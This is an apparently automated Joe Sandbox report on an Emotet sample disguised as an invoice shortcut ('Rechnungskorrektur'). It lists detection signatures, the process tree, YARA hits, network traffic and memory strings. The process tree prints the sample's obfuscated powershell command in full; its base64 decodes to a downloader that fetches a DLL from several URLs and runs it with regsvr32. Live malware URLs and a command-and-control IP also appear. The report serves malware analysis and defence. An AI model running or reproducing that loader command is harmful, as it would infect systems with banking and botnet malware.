Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rechnungskorrektur 2022.20.05_1305.lnk

Overview

General Information

Sample Name:Rechnungskorrektur 2022.20.05_1305.lnk
Analysis ID:632058
MD5:9bb223b115ec73b8419e37ce00051da9
SHA1:fe98ee24f390ba1778742f32ad4b22220aaa31ff
SHA256:66cdacf636ffc45e84ff842fe9c6c217641af99f0e41729b2a3ee8488763ea81
Tags:lnk
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 1340 cmdline: C:\Windows\System32\cmd.exe" /v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)} MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1192 cmdline: powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • regsvr32.exe (PID: 5964 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\JydgVvbPD\MevgMvopaw.BUS MD5: D78B75FC68247E8A63ACBA846182740E)
        • regsvr32.exe (PID: 5640 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\UjKMhzOwg\JWwyPPSZDhCDc.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
      • svchost.exe (PID: 5964 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3396 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3120 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3364 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5936 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5548 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3104 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7112 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 1296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Rechnungskorrektur 2022.20.05_1305.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x2b3:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x2b3:$r2: p^o^w^e^r^s^h^e^l^l
Rechnungskorrektur 2022.20.05_1305.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.302284085.0000000001DE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000009.00000002.528233629.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000006.00000002.302481665.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000009.00000002.526430630.0000000000730000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Process Memory Space: powershell.exe PID: 1192INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x1029:$b2: ::FromBase64String(
            • 0x1c73:$b2: ::FromBase64String(
            • 0x18014:$b2: ::FromBase64String(
            • 0x18371:$b2: ::FromBase64String(
            • 0x187e4:$b2: ::FromBase64String(
            • 0x2e506:$b2: ::FromBase64String(
            • 0x2e861:$b2: ::FromBase64String(
            • 0x2f287:$b2: ::FromBase64String(
            • 0x2f65c:$b2: ::FromBase64String(
            • 0x2fa9a:$b2: ::FromBase64String(
            • 0x2fdf5:$b2: ::FromBase64String(
            • 0x3021b:$b2: ::FromBase64String(
            • 0x3078b:$b2: ::FromBase64String(
            • 0x607b9:$b2: ::FromBase64String(
            • 0x60e57:$b2: ::FromBase64String(
            • 0x64e8d:$b2: ::FromBase64String(
            • 0x6a83d:$b2: ::FromBase64String(
            • 0x6cbfc:$b2: ::FromBase64String(
            • 0x6cf55:$b2: ::FromBase64String(
            • 0x6ff6b:$b2: ::FromBase64String(
            • 0x7012d:$b2: ::FromBase64String(
            SourceRuleDescriptionAuthorStrings
            6.2.regsvr32.exe.1de0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              9.2.regsvr32.exe.730000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                9.2.regsvr32.exe.730000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  6.2.regsvr32.exe.1de0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Rechnungskorrektur 2022.20.05_1305.lnkReversingLabs: Detection: 39%
                    Source: https://173.82.82.196:8080/tAvira URL Cloud: Label: malware
                    Source: http://mandom.co.id/assets/TpIIt7SmNBsWCECLoHrS/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/temAvira URL Cloud: Label: malware
                    Source: http://pacemaker.cd/images/Xc/Avira URL Cloud: Label: phishing
                    Source: https://173.82.82.196/URL Reputation: Label: malware
                    Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                    Source: http://masidiomas.com/D4WStats/GAhmgvhLgUn6/Avira URL Cloud: Label: malware
                    Source: https://bpsjambi.id/about/VPe69A9Tk/Avira URL Cloud: Label: malware
                    Source: http://marmaris.com.br/wp-admin/2cfpSuAH/Avira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUSReversingLabs: Detection: 58%
                    Source: C:\Windows\System32\UjKMhzOwg\JWwyPPSZDhCDc.dll (copy)ReversingLabs: Detection: 58%
                    Source: Rechnungskorrektur 2022.20.05_1305.lnkJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUSJoe Sandbox ML: detected
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,

                    Networking

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080
                    Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
                    Source: Joe Sandbox ViewIP Address: 173.82.82.196 173.82.82.196
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 23 May 2022 06:57:52 GMTContent-Type: application/x-msdownloadContent-Length: 365056Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 06:57:52 GMTContent-Disposition: attachment; filename="yp1jibJUDxA8rrRg9xQmhd9iHCWQ.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b30701384e=1653289072; expires=Mon, 23-May-2022 06:58:52 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 06:57:52 GMTX-Cache-Status: MISSX-Powered-By: PleskLinData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ik
                    Source: global trafficHTTP traffic detected: GET /assets/TpIIt7SmNBsWCECLoHrS/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: mandom.co.idConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.4:49772 -> 173.82.82.196:8080
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: svchost.exe, 0000001A.00000003.512271801.000002B983F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000001A.00000003.512271801.000002B983F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000001A.00000003.512271801.000002B983F74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.512292421.000002B983F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                    Source: svchost.exe, 0000001A.00000003.512271801.000002B983F74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.512292421.000002B983F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
